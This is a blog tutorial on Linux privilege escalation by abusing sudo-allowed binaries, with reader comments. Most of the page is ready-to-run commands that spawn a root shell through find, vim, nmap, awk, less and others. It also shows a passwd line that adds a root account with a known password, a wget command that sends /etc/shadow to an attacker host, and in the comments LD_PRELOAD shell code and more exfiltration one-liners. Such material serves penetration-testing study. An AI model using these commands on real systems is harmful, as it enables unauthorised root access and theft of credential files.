Skip to content

Abusing SUDO (Linux Privilege Escalation)

If you have a limited shell that has access to some programs using the commandsudo you might be able to escalate your privileges. here I show some of the binary which helps you to escalate privilege using the sudo command. But before Privilege Escalation let’s understand some sudoer file syntax and what is sudo command is? ;).

Index

  1. What is SUDO?
  2. Sudoer FIle Syntax.
  3. Exploiting SUDO user
    • /usr/bin/find
    • /usr/bin/nano
    • /usr/bin/vim
    • /usr/bin/man
    • /usr/bin/awk
    • /usr/bin/less
    • /usr/bin/nmap ( –interactive and –script method)
    • /bin/more
    • /usr/bin/wget
    • /usr/sbin/apache2

What is SUDO ??

The SUDO(Substitute User and Do) command, allows users to delegate privileges resources proceeding activity logging. In other words, users can execute command under root ( or other users) using their own passwords instead of root’s one or without password depending upon sudoers setting The rules considering the decision making about granting an access, we can find in /etc/sudoers file.


Sudoer File Syntax.

root ALL=(ALL) ALL

Explain 1: The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.

The first part is the user, the second is the terminal from where the user can use the sudocommand, the third part is which users he may act as, and the last one is which commands he may run when using.sudo

touhid ALL= /sbin/poweroff

Explain 2: The above command, makes the user touhid can from any terminal, run the command power off using touhid’s user password.

touhid ALL = (root) NOPASSWD: /usr/bin/find

Explain 3:  The above command, make the user touhid can from any terminal, run the command find as root user without password.


Exploiting SUDO Users.

To Exploiting sudo user u need to find which command u have to allow.
sudo -l

The above command shows which command have allowed to the current user.

sudo list

Here sudo -l, Shows the user has all this binary allowed to do as on root user without password.

Let’s take a look at all binary one by one (which is mention in index only) and Escalate Privilege to root user.

Using Find Command

sudo find /etc/passwd -exec /bin/sh \;

or

sudo find /bin -name nano -exec /bin/sh \;

Using Vim Command

sudo vim -c '!sh'

Using Nmap Command

Old way.

sudo nmap --interactive
nmap> !sh
sh-4.1#

Note : nmap –interactive option not available in latest nmap.

Latest Way without –interactive

echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse

Using Man Command

sudo man man

after that press !sh and hit enter

Using Less/More Command

sudo less /etc/hosts
sudo more /etc/hosts

after that press !sh and hit enter

Using awk Command

 sudo awk 'BEGIN {system("/bin/sh")}'

Using nano Command

nano is text editor using this editor u can modify passwd file and add a user in passwd file as root privilege after that u need to switch user. Add this line in /etc/passwd to order to add the user as root privilege.

touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash

sudo nano  /etc/passwd

now switch user password is : test

su touhid

Using wget Command

this very cool way which requires a Web Server to download a file. This way i never saw on anywhere. lets explain this.

On Attaker Side.

  • First Copy Target’s /etc/passwd file to attacker machine.
  • modify file and add a user in passwd file which is saved in the previous step to the attacker machine.
  • append this line only =>  touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
  • host that passwd file to using any web server.

On Victim Side.

sudo wget http://192.168.56.1:8080/passwd -O /etc/passwd

now switch user password is : test

su touhid

Note: if u want to dump file from a server like a root’s ssh key, Shadow file etc.

sudo wget --post-file=/etc/shadow 192.168.56.1:8080

Setup Listener on attacker : nclvp 8080

Using apache Command

sadly u cant get Shell and Cant edit system files.

but using this u can view system files.

sudo apache2 -f /etc/shadow

Output is like this :

Syntax error on line 1 of /etc/shadow:
Invalid command 'root:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration

Sadly no Shell. But you manage to extract root hash now Crack hash in your machine. For Shadow Cracking click here for more.


I posted some if you know any other please comment and share knowledge to other Happy HAcking.

Published inPost ExploitPrivilege Escalation

41 Comments

  1. sudo mount -o bind /bin/bash /bin/mount
    sudo mount

  2. for extracting files

    nc -lvp 80 > server_passwd
    wget 127.0.0.1 –post-file /etc/passwd

  3. Youngeun Moon Youngeun Moon

    Thanks for the kind post. Could I post on my blog after translating into my language, Korean?

    • Pleasure mate. You can POST on your Blog but you give the credit to the original author(me) on a post.

  4. David Schoen David Schoen

    sudo strace -o/dev/null /bin/bash

  5. Pradeep Jairamani Pradeep Jairamani

    Great and extensive guide (y)

  6. Andrew Andrew

    anyone way to prevent all of these but still allowing sudoer to su to root if they know the root password?

    • if u know the root’s password u dont need sudo group… u can get root’s privilege using “su – root” or “su root” and just type root’s password. but in some system like Solaris your current user must be an authorized user to do su command

  7. Andrew Andrew

    I understand. I didn’t explain myself better hehe. I have Default rootpw in sudoers file which only allow the sudoer to su to root if I know the root password. So any command sudoer runs will require root’s password, in case suder is compromised. I thought that your methods are able to bypass this but I just tried all of them and you can’t.

  8. Danners Danners

    Really cool list Touhid!

  9. Hege Hege

    @Andrew just restrict everything in the sudoers file and put only this line there:

    %su ALL=(root) /bin/su

    Then add your reliable users to the “su” group and get a root shell with “sudo su” and password.

  10. Andrew Andrew

    Thanks, but I don’t think that’s what I want. Your method allows sudoer to su to root with just sudoer’s password. “Default rootpw” requires root password, and all privilege escalation mentioned here do not work.

  11. Dinesh Dinesh

    Sudo python -c ‘import pty; pty.spawn(“/bin/bash”)’.
    Or the matter, any language like ruby or perl which can run a shell.

  12. MorningStar MorningStar

    That was awesomely explained!

    • thanks man.. your word is boots me for more post. i hope u ll like my next posts also.

  13. yeetteey yeetteey

    su: Unknown id: touhid

  14. Vic Vic

    could you please explain how the “sudo less /etc/hosts” and then “!sh” works? How and why is it working?

  15. frank frank

    I’m using your method under wget, followed it exactly as you say, but I’m getting “unknown ID” when trying to switch user?

    • this method is works on Linux system.. if you are doing other than Linux like Solaris this method not work like this.

  16. Bowlslaw Bowlslaw

    What is special about Solaris? How can I get it to work on Solaris?

  17. H H

    I was wondering if it’s there any way to abuse of sudo if the entries are related to apt actions, for example :

    touhid ALL = (root) NOPASSWD: /usr/bin/apt-get
    touhid ALL = (root) NOPASSWD: /usr/bin/apt-cache

    I’ve been checking a few test cases and it seems no to work, since you abuse of sudo just because the cmd tools have execution modes.

    Thanks in advance,
    H.

  18. toto toto

    TH3xACE/SUDO_KILLER from github is a nice tool to automate the above described sceanarios and much more

  19. spy spy

    Regarding apache2, you can use the following C code (e.g. preload.c):

    #include
    #include
    #include

    void _init() {
    unsetenv(“LD_PRELOAD”);
    setresuid(0,0,0);
    system(“/bin/bash -p”);
    }

    and then run it like so:
    gcc -fPIC -shared -o /tmp/x.so preload.c -nostartfiles
    sudo LD_PRELOAD=/tmp/x.so apache2

    You’ll get shell.

Leave a Reply

Your email address will not be published. Required fields are marked *